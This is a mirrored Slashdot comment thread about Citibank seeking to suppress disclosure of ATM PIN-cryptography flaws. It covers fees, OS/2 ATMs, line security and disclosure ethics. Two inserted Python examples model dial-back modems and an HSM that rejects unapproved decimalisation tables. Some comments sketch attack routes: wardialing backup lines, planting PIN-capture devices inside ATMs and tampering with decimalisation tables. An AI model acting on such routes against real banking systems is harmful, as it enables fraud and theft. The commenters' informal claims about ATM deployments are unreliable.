Slashdot Mirror


Citibank Tries to Hush ATM Crypto Vulnerability

palme999 writes "Citibank is trying to get a gag order for new vulnerabilities found in the cryptographic equipment commonly used to protect the PINs of ATM transactions. The vulnerabilities came to light during a court case involving 'phantom' ATM transactions that users deny making but that banks still charge to customers accounts because they claim their systems are secure."

385 comments

  1. Fees... by RyansPrivates · · Score: 1, Interesting

    I love ATM fees. I can use a 'FREE' ATM and still am charged a fee from my own bank! With all this dough they are raking in, they should be COMPLETELY secure!!!

    --
    If at first you don't succeed... How does that go again? Ah, forget it.
    1. Re:Fees... by Lawbeefaroni · · Score: 5, Insightful

      They're not completely secure because if they were, it would put a dent in all that dough they're raking in. Security through obscurity is free, security that is secure isn't.

      --
      "When it rains, it pours." --Morton's Salt
    2. Re:Fees... by Old+Wolf · · Score: 1

      This isn't security through obscurity - unless you would include in "obscurity" the need to keep your password secret!

    3. Re:Fees... by Anonymous Coward · · Score: 0

      Then get a better bank. Some banks not only do not charge you to use other banks' ATMs, but they go even further. They'll refund other banks' service charges for using their ATMs. Then you don't have to go running all over town looking for a free ATM.

      You, as a consumer, have a choice. You don't have to take it up the ass if you don't want to.

    4. Re:Fees... by Anonymous Coward · · Score: 0

      I love ATM fees. I can use a 'FREE' ATM and still am charged a fee from my own bank!

      Corporations seem to get away with more crap in the US. The banks tried this stunt in the UK but had to back down after about a month and scrap the charges.

      OTOH we let the government get away with too much...

    5. Re:Fees... by Twylite · · Score: 1

      Perfect security is perfectly unusable. The weakest point in the security of the global financial system is the end user.

      A trivial PIN attack takes on average 5000 guesses, and can be conducted by inserting a stolen card into the same or different ATMs 2500 times. An even more simple attack obtains the PIN in one attempt with 80% certainty, and involves nothing more than a gun.

      Newer systems will (in the future) employ Smart Cards for security. Unfortunately it is possible to retrieve secret data from most Smart Cards with $30,000 of equipment, and even duplicate them for a little more.

      Biometrics are easily fooled and, as most security conscious people should know, serve as identification rather than authentication mechanisms. As usual, a Smith & Wesson beats a Smart Card, retinal scan, DNA fingerprint and 357 digit PIN. Bummer.

      Which of course, if you think about it, means that it is in the consumer's interest that the banking system has weaknesses. Case in point: car alarms and immobilisers have increased the incidence of hijacking; later anti-hijack devices increased the incidence of kidnapping and murder in association with hijacks. Leaving your keys in the ignition involves significantly less trauma and threat to life.

      At some point, security becomes so inconvenient that no-one wants to use the system anymore. i.e. a self-destruct.

      --
      i-name =twylite [http://public.xdi.org/=twylite], see idcommons.net
  2. ATM? I don't need no stinkin' ATM! by zmcgrew · · Score: 5, Funny

    Hehe.
    The ATM in the WalMart by us runs Windows.
    And it crashes, gives blue screens, and popup error messages all the time.

    Who needs security when the system can't even run stably?

    --
    Location: Mt. Xinu
    1. Re:ATM? I don't need no stinkin' ATM! by UberLord · · Score: 1, Offtopic

      Who needs security when the system can't even run stably?

      That's like saying people on 56k dialup who are online for about an hour a day on average don't need firewalls.

      Heck, I get a firewall up before I even think about going online!

    2. Re:ATM? I don't need no stinkin' ATM! by spasm · · Score: 1, Funny

      really? where do you live? {grin}

    3. Re:ATM? I don't need no stinkin' ATM! by TheRaven64 · · Score: 2, Interesting

      I've seen Windows ATMs before (there's one near me that regularly has a DHCP error dialog showing) but I recently went up to use one in one of the London stations. As I approached it crashed (Computers often do that to me.) It then went through the OS/2 boot-up sequence...

      --
      I am TheRaven on Soylent News
    4. Re:ATM? I don't need no stinkin' ATM! by unicron · · Score: 1

      You'd have to go inside a WalMart though. That alone makes it not really an option.

      --
      Finally, math books without any of that base 6 crap in them.
    5. Re:ATM? I don't need no stinkin' ATM! by joshsisk · · Score: 1

      Some places, especially smaller towns, only have Walmarts - because the Wal-Marts run every competitor out of business.

    6. Re:ATM? I don't need no stinkin' ATM! by Anonymous Coward · · Score: 0

      This is true...I work for a Credit Union, and all of our ATMs run OS/2.

    7. Re:ATM? I don't need no stinkin' ATM! by unicron · · Score: 1

      Nothing I ever need to buy has a picture of Jeff Gordon on it, so I suspect I would be fine.

      --
      Finally, math books without any of that base 6 crap in them.
    8. Re:ATM? I don't need no stinkin' ATM! by joshsisk · · Score: 1

      Do you need to buy groceries? In my girlfriend's home town, the only place to buy groceries within about 15 miles is a Wal-Mart... unless you count 7-11/Circle K's, which also are heavy on NASCAR imagery.

      Many smaller towns are like this. Even in my home town (pop 250,000+), Super Wal-Marts are knocking many of the grocery stores out of business.

    9. Re:ATM? I don't need no stinkin' ATM! by lasmith05 · · Score: 1

      You know it's funny that you mention this... In my area I once saw an ATM crash badly... (and it turned out to be OS/2) This was Wells Fargo BTW.

      --
      www.samuraidreams.com - My Blog
      www.samuraifiles.com - Get Some Videos Here
    10. Re:ATM? I don't need no stinkin' ATM! by hazem · · Score: 3, Insightful

      It's not just Walmart - it's the people of the town who choose to shop there. If a majority of the people in a town continued to shop at their normal places, rather than the new Walmart, the Walmart would not do well, and old places would do fine.

      But, most people will choose to pay $1.00 for a loaf of bread instead of $1.50. In that case, they are giving up the "old way" for that $0.50. It's their choice. You can't blame it all on Walmart.

    11. Re:ATM? I don't need no stinkin' ATM! by SN74S181 · · Score: 1

      What OS does your firewall run?

      If you mean you click on a 'firewall' icon before you go online, ummm.....

    12. Re:ATM? I don't need no stinkin' ATM! by joshsisk · · Score: 1

      I didn't blame it on anyone. I'm simply pointing out that some people can't shop anywhere BUT wal-mart, unless they want to drive miles and miles out of their way, in response to the guy who said that you should just avoid wal-mart.

    13. Re:ATM? I don't need no stinkin' ATM! by hazem · · Score: 1

      I don't care for them much either. Unfortunately, most people put the cost issue as the most important.. and we get stuck like that.

    14. Re:ATM? I don't need no stinkin' ATM! by Anonymous Coward · · Score: 0

      I did some consulting work for Diebold and had access to their engineering department. OS/2 was the operating system they used in the ATMs they were building at that time. This was several years ago, so I don't know if it still holds true....

  3. How do banks secure ATM lines? by AcquaCow · · Score: 0, Offtopic

    How do bank ATM lines work anyway? Are they over phone or satellite? Has anyone ever managed to break into them remotely?

    --

    up 12 days, 22:30, 2 users, load averages: 993.20, 994.21, 994.56
    *makes note to limit user processes...
    1. Re:How do banks secure ATM lines? by Lxy · · Score: 3, Informative

      The ATMs I've seen are POTS lines. The older machines actually dial up to somewhere, the newer ones either found a better way to do it or turned off the modem speaker. As for what's being done I don't know, but doing RSA over PPP sounds like a decent, flexible option.

      --

      There is no reasonable defense against an idiot with an agenda
      :wq
    2. Re:How do banks secure ATM lines? by SquadBoy · · Score: 4, Interesting

      They are some kind of leased line. We have customers that run on Frame, ISDN, and yes even dialup but mostly they go into some kind of Frame cloud. No they are not satellite and although a few people are trying to do them over VPNs it is for obvious reasons thought of as being a *very* bad thing. While this does not apply to what they are talking about in the article they mostly use 3DES for all the traffic that goes over the line. So an attacker could most likely wardial and find the dial backup lines and try to get in that way. But why bother with that when most places have dial in lines on their mainframes. Other than that if you had or could get access to the Frame cloud you could try. But at least the ones I work with are *very* hardened and most likely not worth the time/effort to break them remotely because it is hard to get cash over a line and breaking an ATM does not really get you into the mainframe. Far better and easier to try to break the mainframe mostly because there are far more ways to get to them and banks etc. do not pay nearly as much attention to security as you would think. This in spite of the fact that I yell at people all day long on the subject but I'm just one guy and they consider me paranoid. Gawd I hate people. Anyway hope the above answers your questions which could be summed up as I've never heard of anybody breaking them remotely and it would be *very* hard to do so.

      --

      Cypherpunks: Civil Liberty Through Complex Mathematics. Those who live by the sword die by the arrow.
    3. Re:How do banks secure ATM lines? by greechneb · · Score: 5, Informative

      Basically, there are two options for an ATM,

      Either POTS (plain old telephone service) with a modem dialing in to a service provider, whether it be the bank itself, or outsourced.

      or Leased Line - always connected to the service provider.

      Encryption is going towards all triple DES encryption within the next year. The ATMs that I have been dealing with all run a form of OS/2 for the operating system.

      The majority of ATMs just have a dial up line that is set to block incoming calls, so the only connection is being made from the ATM to the service provider.

    4. Re:How do banks secure ATM lines? by froth · · Score: 4, Informative

      Everyone has mentioned that ATMs use POTS. This is true. But most of them use a dial-back feature to increase security. They phone home (a pre-configured number, the only way to change this number is to physically open the ATM), hang up and wait for the return call. They will not answer unless they have called out first. ATMs are pretty damn secure.

      --
      "I murder kittens, robot. Whats it to 'ya?" - Badguy
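
The dial-back behaviour described in the post above, written out as an added example (not the poster's code and not any vendor's firmware). It models only the ATM side: the host number is fixed at configuration time, an outbound call opens a callback window, and an inbound ring is answered only if a callback is pending, the window has not expired and (an assumption not in the post) the caller ID matches the configured host. The host number and caller IDs are constructed placeholders.

```python
from dataclasses import dataclass, field
from enum import Enum, auto


class State(Enum):
    IDLE = auto()
    AWAITING_CALLBACK = auto()
    CONNECTED = auto()


@dataclass
class DialBackModem:
    """ATM-side dial-back logic (constructed example, not vendor code).

    host_number is fixed at configuration time; the post says changing it
    needs the cabinet opened, so there is deliberately no setter here.
    """
    host_number: str
    callback_window_s: float = 60.0
    state: State = State.IDLE
    deadline: float = 0.0
    log: list = field(default_factory=list)

    def phone_home(self, now: float) -> None:
        """Dial the configured host, hang up, and open the callback window."""
        self.log.append(f"t={now}: dial {self.host_number}, hang up, wait for callback")
        self.state = State.AWAITING_CALLBACK
        self.deadline = now + self.callback_window_s

    def incoming_call(self, caller_id: str, now: float) -> bool:
        """Decide whether to answer an inbound ring.

        Returns True only for a callback that is expected, on time and
        (assumption) from the host's own number as reported by caller ID.
        """
        if self.state is not State.AWAITING_CALLBACK:
            self.log.append(f"t={now}: unsolicited call from {caller_id} ignored")
            return False
        if now > self.deadline:
            self.log.append(f"t={now}: callback window expired, back to idle")
            self.state = State.IDLE
            return False
        if caller_id != self.host_number:
            self.log.append(f"t={now}: call from {caller_id} is not the host, ignored")
            return False
        self.state = State.CONNECTED
        self.log.append(f"t={now}: callback from {caller_id} answered, session up")
        return True


def simulate() -> list:
    """Run the three cases a reviewer cares about and return the decision log."""
    atm = DialBackModem(host_number="HOST-NUMBER-PLACEHOLDER")
    atm.incoming_call("UNKNOWN-CALLER", now=0.0)            # nobody asked for a call
    atm.phone_home(now=10.0)
    atm.incoming_call("UNKNOWN-CALLER", now=12.0)           # wrong caller inside the window
    atm.incoming_call("HOST-NUMBER-PLACEHOLDER", now=15.0)  # the genuine callback
    return atm.log


if __name__ == "__main__":
    for line in simulate():
        print(line)
```

The window timeout matters as much as the "never answer first" rule: without it, a single outbound call would leave the modem willing to answer indefinitely.
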
    5. Re:How do banks secure ATM lines? by Anonymous Coward · · Score: 0

      Has anyone broken in? Yes. Unsolved crime using an Apple ][, a 3 day weekend, and dressing up like a road crew.

    6. Re:How do banks secure ATM lines? by Rich0 · · Score: 1

      No they are not satelite and although a few people are trying to do them over VPNs it is for obvious reasons thought of as being a *very* bad thing.

      You mean like running your ATM network from a system accessible by the general internet?

    7. Re:How do banks secure ATM lines? by sidvishus9 · · Score: 1

      http://www.sgpd.com/Crime_Prevention/ATM_Security/atm_security.html "Shield" with your body. I think this would do more to increase security than anything else.

    8. Re:How do banks secure ATM lines? by Anonymous Coward · · Score: 2, Informative

      Dial-up or kilostream, normally. PIN traffic is hashed with the account number to prevent replay attacks and encrypted using DES (soon to be triple DES).

      It's virtually impossible to mount a successful attack from outside. The vulnerable part used to be inside the machine, between the keypad and the encrypting device, where the PIN travels in the clear down a short cable. Bent engineers have actually planted devices (like Psion handhelds) inside ATMs to capture PINs and card numbers! This is currently being addressed by retro-fittable keypads which do the encryption themselves, so there are no cables to tap.

      This exploit for the ATM system (like the one last year for IBM 4758 cryptoprocessors) requires privileged access and would have to be an "inside job". The fix is also relatively simple - ensure no-one can frig about with the decimalisation table in the Host Security Module. Typically only two or three people in the bank have access to these boxes; they usually require more than one person to unlock the case and get to the keypad, so you can't just hack in and change the tables over the corporate network.
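
The fix the post above recommends, "ensure no-one can frig about with the decimalisation table in the Host Security Module", as an added example that is not the poster's code and not any HSM vendor's firmware. It assumes the IBM 3624 PIN-offset scheme that such modules implement for PIN verification (the post does not name it) and substitutes HMAC-SHA256 for the DES encryption step so it runs without a DES library; the PIN derivation key, PAN padding rule and sample PAN are constructed. The point it shows is that the verify command refuses any host-supplied table that was not loaded at the key ceremony, so whoever can reach the HSM over the corporate network still cannot change the table it computes with.

```python
import hashlib
import hmac

# The standard decimalisation table: hex digit i maps to dectab[i], so
# 0-9 stay as they are and A-F wrap to 0-5.
STANDARD_DECTAB = "0123456789012345"


def decimalise(hex_digits: str, dectab: str) -> str:
    return "".join(dectab[int(c, 16)] for c in hex_digits)


def pseudo_encrypt(key: bytes, validation_data: str) -> str:
    # Stand-in for encrypting the validation data under the PIN derivation key.
    # Assumption: HMAC-SHA256 truncated to 16 hex digits so the example runs
    # without a DES library; the real scheme uses (3)DES here.
    digest = hmac.new(key, validation_data.encode(), hashlib.sha256).hexdigest()
    return digest[:16].upper()


class HostSecurityModule:
    """Model of the PIN-verify command with the mitigation the post describes:
    the host supplies a table with each request, but the module only honours
    tables that were loaded under dual control at key-ceremony time."""

    def __init__(self, pin_derivation_key: bytes, approved_tables=(STANDARD_DECTAB,)):
        self._pdk = pin_derivation_key            # never leaves the module
        self._approved = frozenset(approved_tables)

    def _check_table(self, dectab: str) -> None:
        if len(dectab) != 16 or not dectab.isdigit():
            raise ValueError("decimalisation table must be 16 decimal digits")
        if dectab not in self._approved:
            # A table that was not loaded at the ceremony is refused outright,
            # so the verify command cannot be driven with arbitrary tables.
            raise PermissionError("decimalisation table not approved")

    def natural_pin(self, pan: str, dectab: str = STANDARD_DECTAB, length: int = 4) -> str:
        self._check_table(dectab)
        validation_data = pan.zfill(16)[-16:]     # assumption: PAN padded to 16 digits
        return decimalise(pseudo_encrypt(self._pdk, validation_data), dectab)[:length]

    def verify_pin(self, pan: str, offset: str, entered_pin: str,
                   dectab: str = STANDARD_DECTAB) -> bool:
        natural = self.natural_pin(pan, dectab, len(offset))
        expected = "".join(str((int(n) + int(o)) % 10) for n, o in zip(natural, offset))
        return hmac.compare_digest(expected, entered_pin)


def compute_offset(natural_pin: str, chosen_pin: str) -> str:
    """Offset stored by the issuer so that natural + offset = chosen, digit-wise mod 10."""
    return "".join(str((int(c) - int(n)) % 10) for n, c in zip(natural_pin, chosen_pin))


if __name__ == "__main__":
    hsm = HostSecurityModule(pin_derivation_key=b"constructed-demo-key")
    pan = "4000123456789010"                      # constructed sample PAN
    offset = compute_offset(hsm.natural_pin(pan), "1234")
    print("correct PIN accepted:", hsm.verify_pin(pan, offset, "1234"))
    print("wrong PIN accepted:  ", hsm.verify_pin(pan, offset, "9999"))
    try:
        hsm.verify_pin(pan, offset, "1234", dectab="0123456789011111")
    except PermissionError as e:
        print("modified table:", e)
```

The allowlist lives inside the module and is populated only in the constructor, which stands in for the dual-control ceremony the post mentions; a host API that let a single operator add tables at run time would undo the check.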

    9. Re:How do banks secure ATM lines? by trolman · · Score: 1

      How do banks secure ATM lines?

      With closed communications lines, a little crypto, some intrusion detection, and a lot of secrecy.

    10. Re:How do banks secure ATM lines? by Anonymous Coward · · Score: 0

      Gawd I hate people.

      As a sysadmin, security nut, and sometime fellow misanthrope, I just want to point out: this is what's making you ineffective. The sole point of better information security (or anything else about IT) is people. Learn to love people and understand why they do what they do, and you'll not only be happier, you'll be far better able to have a real positive influence on the security issues that concern you.

      Sorry if that sounds all preachy and virtuous, it's just that this is still a somewhat recent revelation for me (last few years). But it really works (and nothing else ever did).

      Rationality is a human invention. When people seem to be acting in frustratingly irrational ways, there's nearly always a good reason for it. You just need to adjust your own use of Reason to compensate. Actually caring about users gets you halfway there, because you can see what it's like from their POV.

    11. Re:How do banks secure ATM lines? by Old+Wolf · · Score: 1, Informative

      Here they use X.25 (traveling via the PSTN to get to the X.25 network). The X.25 protocol includes security so that you can't forge a source address. The communications aspect is considered to be secure, which is why this attack is happening at the HSM level.

    12. Re:How do banks secure ATM lines? by rusty0101 · · Score: 3, Informative

      There are several different methods used.

      There are two basic ATM types. IP connected, and bisync/sdlc connected.

      IP connected use routers with frame and dedicated circuit connections. Some may be using VPNs with ISPs, but none that I have worked with do.

      Bisync/SDLC connected ATMs may use a link converter to become effectively IP connected ATMs. As new ATMs come out, those connected via link converters are being replaced.

      Those ATMs that are not connected via a link converter and IP based network use one of three types of connection. Point to point, point to multi-point, and dial. Point to point and point to multi-point may use either analog or digital leased lines.

      Dial up ATMs use a "modem" that acts as a remote front end for the back end system.

      Encryption of the data on the line is handled by the end points. Links between the banks that allow information about your account to be retrieved, or approval for debits and deposits to happen at the atm are also encrypted at several points. Both end point computers encrypt their transactions, the lines themselves use encryptors as well.

      There are some variations to these designs. Each ATM provider uses their own design, and may use a variety of methods to implement ATMs in a particular region, simply to prevent one problem taking down all of the ATMs in an area.

      I have seen ATMs implemented using CDPD for temporary installations.

      Satellite connected installations are extremely rare. The current network infrastructure via satellite is either extremely expensive with low latency, as for example Iridium, or reasonable cost with high latency, via geo-stationary sats. 30Mm adds a 10th of a second in each direction just for speed of light. In a polled environment (bisync/SDLC) a half second delay for each polled device would make ATM responsiveness extremely unpleasant. A bisync line supports up to 32 devices. With Geosync sats, that means that there would be a built in 16 second delay between polls. SDLC supports up to 255 devices, or over 2 minutes. With the existing latency in the back end, getting that kind of a delay in your transactions would be extremely unpleasant.

      The situation may change if prices improve for GlobalStar, but I wouldn't expect it to be used any time soon.

      As has been mentioned elsewhere, breaking into an ATM remotely would be pretty much useless. You can not interact with the device over such a connection, no telnet, ftp or http servers, nor a command prompt interact with this line. So you will not be able to install data capture tools, or tell the ATM to watch for your card and multiply your request authorizations.

      As the article points out, you could spoof a withdrawal, but spoofing a deposit will be voided by no deposit in the ATM.

      I could be wrong however. Just remember that attempting a man in the middle attack for any connection across a telco connection constitutes wire fraud.

      -Rusty

      --
      You never know...
    13. Re:How do banks secure ATM lines? by Battle_Ratt · · Score: 1

      This doesn't address the new breed of private ATMs. They just use a dedicated line to call direct to a network.

      I know this because the guy my wife works for owns a few. The really funny thing about this is that the people who run some of the stores he puts his machines in, will unplug the phone line to it, and make long distance calls on his dime.

    14. Re:How do banks secure ATM lines? by rwise2112 · · Score: 1

      No they are not satellite

      Actually some are satellite based. A few years ago, I was in Dawson City in the Yukon, and there was an ATM in town which had a note stuck on it explaining that the service often didn't work due to a loss of satellite signal.

      --

      "For every expert, there is an equal and opposite expert"
    15. Re:How do banks secure ATM lines? by Anonymous Coward · · Score: 0

      You suck. I hate you. Shut the hell up and die.

    16. Re:How do banks secure ATM lines? by seaan · · Score: 1

      As for what's being done I don't know, but doing RSA over PPP sounds like a decent, flexible option.

      Nope, bzzzt play again! Sorry, did not mean to be impolite. The point-of-sale industry is extremely cost sensitive, and most POS terminals use the equivalent of an 8051 to perform the cryptography. You could theoretically do RSA, but it would take a long, long time. Smartcards will eventually change this, but don't hold your breath. The cost of putting an Ethernet port into a terminal is also pretty laughable.

      My experience selling POS terminals is that the merchant will not pay $1 extra for 3 times the security, they want the absolute minimum cost! Canada had a very stringent specification (through Interac), which at the time my terminal was one of the few that actually met it. The only problem was that instead of enforcing the standards, they granted everyone waivers so they could buy insecure terminals that cost a few dollars less (seriously, something like $200 vs. $195). That was a few years ago, so one could optimistically hope things got better.

      The POS terminals use single-DES (at least in the USA until 2005 or so, when they are scheduled to go to 3DES). Modem connection has become less common, as terminals connected to intelligent cash registers have become more popular (at least in the larger stores). The ANSI X9 provides the standards that govern cryptographic protocols for ATM and POS terminals.

  4. cool by Anonymous Coward · · Score: 1, Funny

    I've been using automated debit for years to pay all of my bills.

    Maybe I can get all of that money back.

  5. Another PIN vuln story by Anonymous Coward · · Score: 3, Informative

    From The Register.

    1. Re:Another PIN vuln story by Anonymous Coward · · Score: 0

      It's the same guys and the same story, just another reporter talking about it.

    2. Re:Another PIN vuln story by Anonymous Coward · · Score: 0

      Yes, and it's ANOTHER story. Didn't say it was a similar story or a different story. This story is actually fairly accessible if you don't have a huge background in the subject.

  6. Re:in case of /. by Anonymous Coward · · Score: 2, Funny

    Nice formatting, why not go vomit on some toddlers while you're at it?

  7. and only 15minutes ago.. by odyrithm · · Score: 2, Interesting

    I watched the ATM (called a cash machine here in the UK) I was withdrawing from reboot.. was using OS/2.. I'm checking now to see if it actually deducted from my account..

    --
    moo
    1. Re:and only 15minutes ago.. by odyrithm · · Score: 1

      nope... but will have to wait 24hours really just to be sure... never trusted os/2 myself.. nething that runs windows like it did is ungodly.

      --
      moo
    2. Re:and only 15minutes ago.. by kfg · · Score: 4, Funny

      For what it's worth, they're called "cash machines" here in the colonies as well.

      A west coastism is to refer to twenty dollar bills as "Yuppie Foodstamps" because cash machines only dispense twenties, and thus people who rely on them never seem to have anything but.

      KFG

    3. Re:and only 15minutes ago.. by odyrithm · · Score: 1

      kewl (cool for the nazis), you learn something every day ;)

      --
      moo
    4. Re:and only 15minutes ago.. by LoadStar · · Score: 1

      For what it's worth, they're called "cash machines" here in the colonies as well.

      One "Wisconsin"-ism is to call ATMs "Tyme machines," mostly because the largest and most visible ATM network in the state was called "Tyme is Money" or just "Tyme" for short. EVERY machine you went to was a Tyme machine, so it just became common for everyone to call them that.

      Two problems; going out of state, then asking locals "Where's the tyme machine" gets you _really_ strange looks, and now that Tyme was purchased by Pulse, there really aren't any Tyme machines anymore.

    5. Re:and only 15minutes ago.. by Anonymous Coward · · Score: 0

      Heh, and in parts of the Midwest (US) we call them... TIME MACHINES! No really, we do. The main ATM company out here was Tyme, as in "Tyme is money".
      ... it sure makes you feel like an idiot when travelling and you ask where the nearest time machine is.

    6. Re:and only 15minutes ago.. by L7_ · · Score: 3, Funny

      But there is no other way to tell if you're alive in Wisconsin unless you go to the Pulse Machine.

    7. Re:and only 15minutes ago.. by klparrot · · Score: 1

      A few years back I had a bank machine crash on me while I was depositing money. Luckily it was in a bank, and they were able to open up the back and get my money back. They rebooted it, and I watched OS/2 start up.

  8. Release the lawyers!!! by TopShelf · · Score: 2, Insightful

    The vulnerabilities came to light during a court case involving 'phantom' ATM transactions that users deny making but that banks still charge to customers accounts because they claim their systems are secure.

    Does anybody smell a class-action for ATM users who have filed these complaints? It would probably work similarly to the CD price-fixing settlement that was in the news lately, since it would be hard to identify the specific members of the class.

    --
    Stop by my site where I write about ERP systems & more
    1. Re:Release the lawyers!!! by rgmoore · · Score: 3, Insightful

      It should be pointed out that this is a problem in the UK, but the US has saner legal rules. The article mentions that Citibank lost a similar case in the US, so apparently the US doesn't think that "our system is secure; it must be the user's fault" is sufficient defense.

      --

      There's no point in questioning authority if you aren't going to listen to the answers.

    2. Re:Release the lawyers!!! by geekoid · · Score: 2, Interesting

      Actually, I would be happier with a settlement that forced atm usage to be free.

      --
      The Kruger Dunning explains most post on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
    3. Re:Release the lawyers!!! by stephanruby · · Score: 0, Troll

      Actually, I would be happier with a settlement that forced atm usage to be free.

      Why stop there? Why don't you force all business owners to let us use their phones for free?

    4. Re:Release the lawyers!!! by stephanruby · · Score: 1

      "Actually, I would be happier with a settlement that forced atm usage to be free. "

      My last post was labeled as a troll, I am offended. Hey I dislike atm fees as much as anybody else, but I don't see how forcing someone to provide a free service for the rest of us is going to help. Here is one argument against ATM fees. Its excerpt is lifted from the Cato institute at http://www.cato.org/dailys/8-27-98.html

      "...If the senator were to look a little closer at the issue, he might realize that the recent boom in the ATM industry -- which has made life far more convenient for consumers -- is the result of increased ATM fees. And if consumers are prohibited from paying for ATM services, they may lose the vast ATM network they now enjoy.

      Consumers in our fast-paced society value quick, convenient access to their money. The first people to realize that were not banks but private entrepreneurs, who saw that they could make a buck by placing ATMs in convenient locations. It was the ATM fee that allowed those companies, which have no other way to recoup their costs for providing and operating the machines, to meet consumer demand. From 1995 to 1996 the number of ATMs ordered from manufacturers increased 40 percent. The number of orders during that time exceeded the orders from 1991 to 1993. Approximately half of those orders were placed, not by "big banks," but by non-banking companies that make most of their revenue from ATM fees.

      The fact that this growth occurred after the two largest ATM networks in the country (Cirrus and Plus) rescinded their ban on surcharges is no coincidence. ATMs in more convenient locations mean that consumers save time and money. Bank customers demand this convenience, and they are willing to pay for it.

      But consumers often say, "I used to get this service without a fee, so why do I have to pay now?" The reason is that ATMs are not free. In the past, when there were no charges for ATM use, there were far fewer ATMs. A low-cost ATM needs at least 3,000 transactions a month to break even. With a fee, that number is cut to 500. Economist David Humphrey of Florida State University found that, although early studies of ATMs predicted savings for banks, the reality is that banks are actually taking a loss to provide this convenience. The consulting firm of McKinsey & Co. estimates that ATMs have cost the industry $1.5 billion and saved only $200 million.

      Banks, like all businesses, want to make money. If they are going to lose money on a service, they will not provide it. With ATM fees, banks and non-bank ATM owners can place ATMs in places that were once not cost justified. Those places include grocery stores, convenience stores, airports and many other sites where people are happy to pay for quick access to cash. As a result, consumers don't have to drive 20 minutes across town to get money out of the bank; instead, they can choose to pay the fee for the convenience of ATMs.

      Many smaller banks also complain because they cannot support vast ATM networks, which are common to larger banks. At the Senate hearings, Wayne Cottle, president of the Dean Co-operative Bank in Franklin, Massachusetts, expressed his fear "that there will be a substantial deposit migration away from my institution." In other words, "I cannot compete in this economy, therefore the government should protect me." Is that any way to run our economy?

      In the American economy, firms that do not provide the services consumers demand are replaced by those that do. What has made this country's economy so prosperous is its refusal to interfere with competition and innovation. Competition is not something the banking industry lacks, given its 200,000 ATMs and 10,000 financial institutions. That free and open competition led to the invention of the ATM in the first place.

      Another important fact to remember is that getting access to your money without a fee is still very easy. Customers can write a check, use a debit card or credit card or simply visit their own bank's ATMs. Those who value convenience less still have other options for getting money, while those who would prefer to pay for this convenience can do so. If Senator D'Amato gets his wish, consumers will lose not only the fees that he despises so much but also the large network of ATMs on which consumers have come to rely. "

      For a longer pdf report, go to http://www.cato.org/pubs/briefs/bp-036.pdf

    5. Re:Release the lawyers!!! by stephanruby · · Score: 1

      If you forced atm usage to be free, four interrelated things would happen

      (1) ATM providers would decrease the number of ATMs they have around

      (2) ATM providers would decrease the maintenance of the ATMs that already exist

      (3) People would switch their accounts to smaller banks with fewer ATMs (since the number of ATMs a bank has wouldn't matter to them anymore)

      (4) Long lines would start to form at popular ATMs

      (5) ATMs would be harder to find and less convenient

      (6) Since all those effects reinforce each other, recurse ad infinitum and go back to step (1), (2), (3), (4), (5), and (6)

  9. Legal fees by hafree · · Score: 0, Offtopic

    I wonder how much that court case cost to take on a huge corporation like Citibank because they blatantly charged you $1 per transaction for a dozen transactions that never happened last month. Hardly seems worth the effort to save $12, but I'm glad someone is fighting for the little guys...

    1. Re:Legal fees by Anonymous Coward · · Score: 0

      I have a feeling it's more about the withdrawals that were those transactions than it is about the 1 dollar fees that they are suing over

    2. Re:Legal fees by Anonymous Coward · · Score: 0

      Yeah, but if they are claiming you withdrew $300 on each of those 12 transactions, you certainly would find the effort to take them to court for that.

  10. Shut them up! by Anonymous Coward · · Score: 2, Interesting

    We all want this to happen! Citi will fix it because it is in the best interest of their customers. Releasing the info would increase the risk of **YOUR** money stolen. Give them time, but follow up with them to ensure it is fixed.

    1. Re:Shut them up! by Daniel+Dvorkin · · Score: 5, Insightful

      Um ... you're kidding, right?

      Citibank has no interest in "the best interest of its customers." Like any other megacorp, they don't give a shit about you. They're much more concerned about the embarrassment of admitting that their security is worthless than they are about actually keeping people's money safe. The only way to get them to fix this problem is to publicize it as loudly as possible, because then not fixing the problem becomes even more of an embarrassment for them.

      --
      The correlation between ignorance of statistics and using "correlation is not causation" as an argument is close to 1.
    2. Re:Shut them up! by dubiousmike · · Score: 1

      He's right. My uncle-in-law is one of the heads of Citibank's private label card division (Home Depot credit card, various chain store credit cards).

      He definitely doesn't give a shit.
      But he does enjoy being rich as fuck.

      Can't say I blame him on that last part. He makes my yearly salary every month.

    3. Re:Shut them up! by antis0c · · Score: 1

      Did you even read any of it? Citi believes their system is 100% secure! They're trying to hush this so they can continue to say it is. Chances of them fixing it are very low. Remember, Citi is in the business to make money. If they can use their lawyers to hush up talk about the security vulnerabilities, then they consider the problem fixed. It's like Microsoft, security through obscurity. "If no one knows about the problem it's not a problem is it?"

      --

      ..There's a-dooin's a-transpirin'
    4. Re:Shut them up! by bongoras · · Score: 1

      actually, I'm sure they'll fix the vulnerability anyhow -- lest they risk lawsuits. However, if they can keep this information out of the public eye, they can fix it slowly over years of routine ATM machine upgrades, instead of spending how-many-millions to replace the crypto units in every ATM machine in the UK. That's the way companies think -- that because something is out of the public eye, and they are showing 'due diligence' in repairing the problem, that's better than admitting they fucked up and fixing it. Now they will probably define 'due diligence' as having a replacement schedule for the faulty hardware. That schedule might be 'wait until the shit breaks anyway' but as long as they have a plan they think they are covered. Solution: someone who doesn't mind jail time should steal money from the bank president's accounts. :-)

    5. Re:Shut them up! by ATMAvatar · · Score: 1

      actually, I'm sure they'll fix the vulnerability anyhow -- lest they risk lawsuits.

      Straight from the article:

      Curiously enough, Citi was also the bank in the case that set US law on
      phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope that's
      an omen, if not a precedent ...


      The legal precedent is that you're outta luck, should someone exploit these vulnerabilities. Citibank knows this. Without the vulnerabilities becoming public knowledge, Citibank has zero reason to fix them. Over time or all at once... it takes money and effort to fix problems, and so long as they're immune to the ill effects of the vulnerabilities, why would they spend the resources to fix it? From Citibank's point of view, it's not a problem.

      --
      "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety."
    6. Re:Shut them up! by Anonymous Coward · · Score: 0

      The bank does not give a damn. They consider a fraud an operational cost that is well-calculated in the scheme. They are fine living with mediocre security because it'd cost them more to implement a more secure and more modern solution than it costs them to deal with some abuses.

      If the issue is released to the public, they face some image problems, and the risk of an attack is becoming more serious, and they would have to fix that. Good.

    7. Re:Shut them up! by Anonymous Coward · · Score: 0

      updating a shitload of ATMs could take years... I do understand SOME of the reasons behind not making it public, but if it is made public, I guess that will light the fire under their proverbial asses

  11. Tell 'em to prove it. by Dolemite_the_Wiz · · Score: 4, Funny

    If Citibank sez that their systems are secure, tell 'em to prove it.

    Dolemite

    --
